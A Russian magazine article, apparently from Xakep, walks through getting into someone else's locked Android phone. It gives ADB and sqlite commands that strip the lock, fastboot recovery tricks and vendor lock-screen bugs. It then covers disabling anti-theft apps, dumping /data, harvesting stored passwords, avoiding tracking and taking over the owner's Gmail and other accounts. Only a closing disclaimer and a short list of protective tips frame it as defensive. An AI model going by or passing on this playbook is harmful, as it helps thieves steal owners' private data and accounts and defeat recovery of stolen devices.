Защищенный экран блокировки в Android может быть трех основных типов. Это четырехзначный пин-код, графический ключ или снимок лица. На разблокировку первых двух дается в общей сложности двадцать попыток, разделенных по пять штук с «минутой отдыха» между ними. На разблокировку по снимку лица есть несколько попыток, после которых смартфон переключается на пин-код. Во всех трех случаях после провала всех попыток смартфон блокируется и спрашивает пароль Google.

Наша задача — попытаться обойти экран блокировки так, чтобы не скатиться к паролю Google, подобрать который уже точно не удастся. Самый простой способ это сделать — используя подключение по USB и ADB:

$ adb shell rm /data/system/gesture.key 

Либо так:

$ adb shell $ cd /data/data/com.android.providers.settings/databases $ sqlite3 settings.db > update system set value=0 where name='lock_pattern_autolock'; > update system set value=0 where name='lockscreen.lockedoutpermanently'; > .quit 

Однако у этого метода есть две проблемы. Он требует прав root и не сработает в Android 4.3 и выше, так как для доступа к ADB нужно подтверждение со стороны устройства, что в условиях залоченного экрана сделать невозможно. Более того, доступ по ADB может быть отключен в настройках.

Мы можем спуститься на уровень ниже и для удаления файла с ключом блокировки использовать консоли восстановления. Для этого достаточно перезагрузиться в консоль восстановления (выключение + включение с зажатой клавишей увеличения громкости) и прошить следующий файл. Он содержит скрипт, который удалит /data/system/gesture.key и снимет блокировку, не нарушая работу текущей прошивки.

Проблема этого подхода — зависимость от кастомной консоли восстановления. Стоковая консоль просто не примет файл как подписанный неверной цифровой подписью. Кроме того, в случае, если активировано шифрование данных, во время следующей загрузки телефон будет заблокирован и его спасет только полное удаление всех данных, что идет вразрез с нашей задачей.

Еще более низкий уровень — это fastboot, то есть манипуляция устройством на уровне загрузчика. Красота этого метода в том, что разблокированный загрузчик позволяет делать с устройством что угодно, включая загрузку и установку кастомной консоли восстановления. Для этого достаточно выключить смартфон (опять же делаем скидку на шифрование данных) и включить его в режиме загрузчика с помощью кнопки питания + «громкость вниз». После этого к устройству можно будет подключиться с помощью fastboot-клиента:

$ fastboot devices 

Теперь скачиваем «сырой» образ кастомной консоли восстановления (с расширением img) для «нашего» устройства и пытаемся его загрузить без установки:

$ fastboot boot cwm-recovery.img 

Если загрузчик девайса разлочен, смартфон перезагрузится в консоль, через которую можно будет активировать режим ADB, залить с его помощью «обновление», ссылка на которое приведена выше, и прошить его. Далее достаточно будет перезагрузиться, чтобы получить полный доступ к смартфону. Кстати, если ты стал обладателем одного из Nexus-устройств, его загрузчик можно легко разблокировать вот так:

$ fastboot oem unlock 

Но это просто информация к размышлению, так как операция разблокировки автоматически сбрасывает устройство до заводских настроек.

Хакер #181. Вся власть роботам!

Теперь о том, что делать, если все эти способы не сработали. В этом случае можно попытаться найти баг в самом экране блокировки. Удивительно, но, несмотря на отсутствие таковых в чистом Android, они довольно часто находятся в экранах блокировок фирменных прошивок от производителя. Например, в Galaxy Note 2 и Galaxy S 3 на базе Android 4.1.2 когда-то была найдена смешная ошибка, которая позволяла на короткое время получить доступ к рабочему столу, просто нажав кнопку «Экстренный вызов», затем кнопку ICE (слева внизу в номеронабирателе) и, наконец, кнопку «Домой». После этого буквально на полсекунды появлялся рабочий стол, чего вполне хватало, чтобы убрать блокировку.

Еще более тупой баг был найден в Xperia Z: можно было набрать на экстренном номеронабирателе код для входа в инженерное меню (##7378423##), с помощью него попасть в меню NFC Diag Test и далее выйти на рабочий стол тем же нажатием кнопки «Домой». Мне очень трудно представить, как могли появиться такие дикие баги, но они есть.

Что касается обхода графического ключа, тут все довольно просто. Он может быть отключен таким же способом, как и пин-код, но здесь есть еще две дополнительные возможности. Во-первых, даже несмотря на внушительное количество возможных вариантов ключей, люди в силу своей психологии чаще всего выбирают ключ, похожий на одну из букв латинского алфавита, то есть те самые Z, U, G, цифра 7 и так далее, что сводит количество возможностей к парам десятков. Во-вторых, при вводе ключа палец оставляет на экране совсем не иллюзорный след, который, даже смазанный, довольно легко угадывается. Впрочем, последний минус может быть легко нивелирован защитной матовой пленкой, на которой следы просто не остаются.

Ну и последнее, о чем хотелось бы сказать, — это так называемый фейсконтроль. Это самый топорный вариант блокировки, который, с одной стороны, очень легко обойти, просто показав смартфону фотку владельца, но с другой — довольно трудно, так как, не зная даже имени владельца, раздобыть его фотографию не представляется возможным. Хотя попробовать сфоткать самого себя, конечно, стоит, вполне возможно, что ты похож на предыдущего владельца.

Графический ключ — самая примитивная мера защиты
Графический ключ — самая примитивная мера защиты

Допустим, что мы обошли экран блокировки. Теперь наши действия будут направлены на то, чтобы вытащить как можно больше информации со смартфона. Сразу оговорюсь, что пароль Google, сервисов вроде Facebook, Twitter и номера кредитных карт нам не достанутся. Ни тех, ни других на смартфоне просто нет; вместо паролей используются аутентификационные токены, которые дают доступ к сервису только с данного смартфона, а вторые хранятся на серверах соответствующих служб (Google Play, PayPal), а вместо них используются те же токены.

Более того, не удастся даже купить что-то в Google Play, так как его последние версии принудительно запрашивают пароль Google при каждой покупке. Эту функцию, кстати, можно отключить, но даже в этом случае смысл покупок будет потерян, так как весь контент будет привязан к чужому аккаунту.

С другой стороны, мы вполне можем если не угнать аккаунты полностью, то хотя бы почитать почту, Facebook и другую личную инфу пользователя, а там уже может оказаться что-то интересное. Особый профит в этом случае даст Gmail, который можно будет использовать для того, чтобы восстановить аккаунт к другим сервисам. А если пользователь при этом еще не успел сходить в салон связи, чтобы заблокировать SIM-карту, то можно будет подтвердить идентичность и с помощью номера телефона. Вот только заниматься этим стоит лишь после отключения всех защитных механизмов (мы же не хотим, чтобы нас отследили с помощью антивора).

Все приложения для отслеживания смартфона под управлением Android можно разделить на три группы: «трэш», «игрушки» и «потянет». Первые отличаются тем, что написаны студентами техникумов за три часа и, по сути, представляют собой самые обычные приложения, умеющие снимать данные с датчика положения и отправлять их непонятно куда. Особая прелесть таких софтин в том, что их очень просто обнаружить и удалить. Фактически достаточно пройтись по списку установленного софта, вбить в поиск непонятные названия, выявить антиворы и удалить их. Именно это и нужно сделать на первом этапе.

Второй тип приложений — это уже что-то претендующее на серьезный инструмент, но на деле им не являющееся. Обычно такой софт умеет не только отсылать координаты на удаленный сервер, но и прятать себя, а также защищаться от удаления. Вторая функция обычно реализуется с помощью создания приложения в виде сервиса без графического интерфейса. В этом случае его иконка не будет видна в списке приложений, но само приложение, конечно же, будет висеть в фоне, что легко определить с помощью любого менеджера процессов.

Защита от удаления в подобном «софте» обычно реализована через прописывание себя в администраторы устройства, поэтому второе действие, которое нужно сделать, — это пойти в «Настройки -> Безопасность -> Администраторы устройства» и просто снять галочки со всех перечисленных там приложений. Система должна запросить пин-код или пароль, но если на экране блокировки его уже нет, то доступ будет открыт сразу. Смешно, но гугловский антивор, фактически встроенный в ОС, отключается точно таким же образом.

Наконец, третий тип приложений, — это антиворы, программированием которых занимались люди. Основное отличие подобных приложений в том, что кроме маскировки они также умеют прописывать себя в раздел /system (если есть root), из-за чего удалить их стандартными средствами становится невозможно. Беда только в том, что в списке процессов они по-прежнему будут видны, а чтобы их отключить, достаточно перейти в «Настройки -> Приложения -> Все», затем ткнуть по нужному приложению и нажать кнопку «Отключить».

Вот и вся защита. В этом списке также должны быть и нормальные приложения, реализованные в виде модуля ядра или хотя бы нативного Linux-приложения, которое ни один стандартный менеджер процессов не покажет, но я почему-то таких еще не видел. С другой стороны, команды ps и lsmod все равно бы их выдали (если это только не правильный бэкдор), так что уровень скрытности повысился бы не сильно.

Вот так просто отключается гугловский антивор
Вот так просто отключается гугловский антивор

Следующий шаг — снятие дампа внутренней памяти. Мы не можем быть уверены, что в телефоне не осталось никаких закладок, особенно если это фирменная прошивка от HTC и Samsung, поэтому перед включением сети лучше сохранить все его данные на нашем жестком диске. Иначе они могут быть удалены в результате удаленного дампа.

Для этого в обязательном порядке нужны права root (если, конечно, телефон еще не рутован). Как их получить, тема отдельной статьи, тем более что для каждого смартфона свои инструкции. Проще всего найти их на тематическом форуме и выполнить, подключив смартфон к компу по USB. В некоторых случаях рутинг потребует перезагрузки, поэтому лучше сразу убедиться, не зашифрованы ли данные смартфона (Настройки -> Безопасность -> Шифрование), иначе после ребута мы потеряем к ним доступ.

Когда root будет получен, просто копируем файлы на жесткий диск с помощью ADB. Нас интересуют только разделы /data и /sdcard, поэтому делаем так (инструкции для Linux):

$ adb root $ adb pull /data $ mkdir sdcard && cd sdcard $ adb pull /sdcard 

Все файлы будут получены в текущий каталог. При этом следует учесть, что если в смартфоне нет слота для SD-карты, то содержимое виртуальной карты памяти будет находиться в разделе /data и вторая команда просто не понадобится.

Что дальше делать с этими файлами, покажет только фантазия. В первую очередь следует обратить внимание на содержимое /data/data, там хранятся все приватные настройки всех установленных приложений (в том числе системных). Форматы хранения этих данных могут быть совершенно различны, но общей практикой считается хранение в традиционных для Android базах данных SQLite3. Обычно они располагаются по примерно таким путям:

/data/data/com.examble.bla-bla/setting.db 

Найти их все можно с помощью команды find в Linux, запущенной в первоначальном каталоге:

$ find . -name *.db 

В них могут содержаться не только личные данные, но и пароли (встроенный браузер хранит их именно так, причем в открытом виде). Достаточно лишь скачать любой графический менеджер баз данных SQLite3 и вбить в его поле поиска строку password.

Делаем дамп памяти на смартфон
Делаем дамп памяти на смартфон
Все данные приложений хранятся в каталоге /data/data
Все данные приложений хранятся в каталоге /data/data
Память не зашифрована, это нам сильно поможет
Память не зашифрована, это нам сильно поможет

Теперь мы наконец можем отключить режим полета, чтобы смартфон смог связаться с сервисами гугла и другими сайтами. SIM-карты в нем уже не должно быть, а определение местоположения (в том числе по IP) можно отключить в «Настройки -> Местоположение». После этого отследить нас уже не получится.

Что делать дальше? Пройтись по переписке в Gmail, отыскать пароли. Особо щепетильные люди даже создают специальную папочку для писем с паролями и конфиденциальной информацией. Также можно попробовать запросить смену пароля на сервисах с подтверждением с помощью email, но в случае Google, Facebook, PayPal и другими нормальными сервисами это сработает только при наличии номера телефона, для чего придется вернуть SIM-карту на место.

В общем и целом здесь все стандартно. У нас есть email, возможно, номер телефона, но нет паролей от сервисов. Всего этого должно быть достаточно для угона многих аккаунтов, но нужно это или нет — вопрос более серьезный. Тот же аккаунт PayPal или WebMoney восстановить чрезвычайно трудно даже самому владельцу, и полученной информации здесь явно будет недостаточно. Смысл угонять аккаунты от «Одноклассников» и других подобных сайтов очень сомнительный.

Еще один совет

Очистить раздел /system от возможных закладок можно, просто переустановив прошивку. Причем использовать лучше неофициальную и прошивать через стандартную консоль восстановления. В этом случае антивор не сможет сделать бэкап самого себя с помощью функций кастомной консоли.

Я ни в коем случае не призываю поступать так, как описано в этой статье. Приведенная в ней информация, наоборот, предназначена для людей, которые хотят защитить свои данные. И вот здесь они могут сделать для себя несколько очевидных выводов.

  • Первый: для защиты информации на смартфоне достаточно всего трех простых механизмов, уже встроенных в смартфон: пароль на экране блокировки, шифрование данных и отключенный ADB. Активированные все вместе, они полностью отрежут все пути доступа к устройству.
  • Второй: иметь на смартфоне антивор очень хорошая идея, но не стоит полагаться на него на 100%. Лучшее, что он может дать, — это возможность удалить данные, если попадется не особо умный вор.
  • Ну и третье, самое очевидное: сразу после потери смартфона необходимо отозвать пароль Google, поменять пароли на всех сервисах и заблокировать SIM-карту.

[authors template=»default»]

ОСТАВЬТЕ ОТВЕТ

Please enter your name here
Please enter your comment!